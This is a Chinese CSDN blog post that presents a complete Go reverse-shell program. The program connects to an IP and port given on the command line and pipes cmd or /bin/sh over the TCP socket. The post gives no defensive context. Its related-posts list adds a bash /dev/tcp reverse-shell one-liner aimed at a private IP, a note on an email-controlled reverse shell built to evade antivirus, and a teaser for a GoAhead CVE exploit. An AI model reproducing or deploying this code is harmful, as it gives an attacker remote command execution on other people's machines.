go反弹shell

已于 2023-03-09 14:17:26 修改
阅读量284 收藏
点赞数
分类专栏: 反弹shell 文章标签: golang 网络
于 2023-03-09 13:50:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39438868/article/details/129421274
版权

go反弹shell

package main

import (
	"flag"
	"fmt"
	"net"
	"os/exec"
)

var (
	ipaddr string
	port   string
	shell  string
)

func main() {
	flag.StringVar(&ipaddr, "ip", "127.0.0.1", "-ip ip地址")
	flag.StringVar(&port, "port", "4444", "-port 端口")
	flag.StringVar(&shell, "shell", "cmd", "-shell cmd或者是/bin/sh")
	flag.Parse()
	ip_port := fmt.Sprintf("%v:%v", ipaddr, port)
	conn, err := net.Dial("tcp", ip_port) // 替换为你的IP和端口
	if err != nil {
		fmt.Println("连接失败:", err)
		return
	}
	fmt.Println("连接成功")
	// 将连接的输入输出重定向到命令行标准输入输出
	cmd := exec.Command(shell)
	cmd.Stdin = conn
	cmd.Stdout = conn
	cmd.Stderr = conn
	// 启动命令行
	err = cmd.Start()
	if err != nil {
		fmt.Println("启动命令行失败:", err)
		return
	}
	fmt.Println("命令行已启动")
	// 等待命令行退出
	err = cmd.Wait()
	if err != nil {
		fmt.Println("命令行退出失败:", err)
		return
	}
	fmt.Println("命令行已退出")
}

在这里插入图片描述

x10n9
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
go语言邮件反弹shell(windows+linux版,windows版用go1.7编译运行不报毒
11-03
go语言邮件反弹shell(windows+linux版,windows版用go1.7编译运行不报毒 此版本为后续改进debug版本,windows下可以编译去掉显示窗口 添加linux版本
Golang反弹shell(使用邮件获取反弹地址)
09-29
使用邮件地址作为反弹shell的服务器地址,用于windows的反弹shell,可在编译时选择隐藏弹出窗口 This golng reverse shell fetches the address from your latest email subject, and the subject should be like this: 10.1.1.1:1234 This golag file requires go-pop3 lib which you can get it here: https://github.com/taknb2nch/go-pop3.git If you want to hide the window when executing it, compile the program like this: go build -ldflags -H=windowsgui email_reverse_shell-repl.go
golang写的反弹shell(自作孽不可活,切记,切记!)
热门推荐
神棍之路
10-23 7万+
仅作安全研究 package main import ( "go-pop3" "log" "strings" "os/exec" "net" "fmt" "syscall" "bufio" ) func reverseshell(addr string){ c,_:=net.Dial("tcp", addr);
GoAhead 远程命令执行漏洞(CVE-2017-17562)反弹shell
Aesthetic99的博客
03-22 6150
GoAhead 远程命令执行漏洞(CVE-2017-17562)反弹shell GoAhead是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的Web Server,多用于嵌入式系统、智能设备。其支持运行ASP、Javascript和标准的CGI程序,这个漏洞就出现在运行CGI程序的时候。 GoAhead在接收到请求后,将会从URL参数中取出键和值注册进CGI程序的环境变量,且只过滤了REMOTE_HOST和HTTP_AUTHORIZATION。我们能够控制环境变量,就有很多攻击方式。比如在
mysql 反弹shell_golang反弹shell脚本
weixin_31293685的博客
01-27 216
一、Golang语言package mainimport ("fmt""net""strings""io/ioutil""log""os/exec")func cmd_connect(c net.Conn) {if c == nil {return}buf := make([]byte, 4096)for {cnt, err := c.Read(buf)if err != nil || cnt =...
渗透测试中的 Go 语言使用:编写反弹后门 Hershell
a13161333486的博客
05-07 2712
  介绍  在渗透测试过程中,一个必备的工具是众所周知的、超级棒的Metasploit框架。  该环境包含大量的payload、编码器和其他工具。在这些payload中Meterpreter有重要意义:它是一个经过开发和后开发命令的修改版的shell。由于其强大的攻击特性,该shell可能是最常用到的。  Meterpreter的问题  不幸的是,Meterpreter的流行有一个缺点:大多数反病...
hershell - Go语言反弹Shell后门.zip
07-18
本案例中,我们关注的是一个名为“hershell”的Go语言编写的反弹Shell后门程序。Go语言,也被称为Golang,是Google开发的一种静态类型的、编译型的、垃圾回收的、并发型且具有C-like语法的编程语言,因其高效性和跨...
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
【不一样的视角剖析Linux 反弹shell】这篇文档深入探讨了Linux环境下反弹shell的详细知识,作者从独特的角度出发,挑战了传统的分类方法,为读者提供了更细致的理解。反弹shell是渗透测试中的关键技术,它涉及被控端...
反弹shell的命令大全
G3et的博客
03-21 869
【代码】反弹shell的命令大全。
revshell 一款非常好用的生成反弹Shell命令的工具
最新发布
ak.Gh0st的博客
08-09 806
revshell是一个由Go语言编写的反弹Shell工具,它是Reverse Shell Generator的命令行版本,旨在帮助安全研究人员和渗透测试人员在需要与目标主机建立反向连接时快速生成相应的Shell代码。目前支持的类型:除了支持多种Shell类型外,revshell还可以运行在多个操作系统平台上,包括Mac、Linux和Windows。这使得用户可以在不同的环境中使用revshell来生成适用于目标主机操作系统的反弹Shell代码,提高了工具的灵活性和适用性。
linux 常用反弹shell小记
weixin_30535167的博客
02-13 196
在渗透测试过程中由于防火墙和其它安全防御措施,很多服务器只能单向向外访问,不能被访问,我们常常需要反弹shell。 1.bash反弹shell 本地开启监听 nc -lvvp 8080 受害主机命令 bash -i >& /dev/tcp/192.168.109.131/8080 0>&1 收到反弹回来的shell 2. ...
GO语言中的单引号、双引号和反引号
Quan的博客
08-24 6469
1.单引号 单引号在go语言中表示golang中的rune(int32)类型,单引号里面是单个字符,对应的值为改字符的ASCII值。 func main() { a := 'A' fmt.Println(a) } 输出: random@random-wz MINGW64 /c/GOPATH/src/Test $ go run main.go 65 2.双引号 在go语言中双引号里面可以是单个字符也可以是字符串,双引号里面可以有转义字符,如\n、\r等,对应go语言中的stri...
golang执行shell命令的几种方式
qq_31389153的博客
10-31 5724
Exec 是 os 包中的一个子包,它可用于使用 Go 运行外部命令。Go exec 命令教程展示了如何在 Golang 中执行 shell 命令和程序。
详解反弹shell命令
shy的博客
04-11 3491
在渗透过程中,经常需要反弹shell,因此总结一下linux反弹shell的几种姿势: bash -i >& /dev/tcp/ip/port 0>&1 bash -i本地打开一个bash >& 输出重定向,将标准输出和标准错误输出都重定向到远程。 /dev/tcp/ip/port/建立一个socket连接到另一个机器上,即远程到其他机...
反弹shell失败的几种原因
谢公子的博客
05-03 1万+
在实战中,我们经常会遇到各种各样奇怪的环境。 反弹shell失败的原因有很多: 反弹的命令不存在或当前用户无权限调用bash 禁止出站IP 禁止出站端口 禁止出站协议 反弹的命令不存在或当前用户无权限调用bash 由于这种情况下只局限于Linux,所以不考虑Windows 反弹shell的命令,尽管这么多命令可以反弹shell,但是最终都还是调用bash来反弹,所以 #bas...
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1330
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
用go语言写一个反弹shell
02-20
我不太清楚go语言,但是我可以尝试给你...查看go语言文档,学习如何使用它来编写反弹shell;2.使用网络资源,如博客、论坛和社交媒体,来获取有关go语言编程的更多信息;3.如果你有疑问,可以在go语言社区上寻求帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值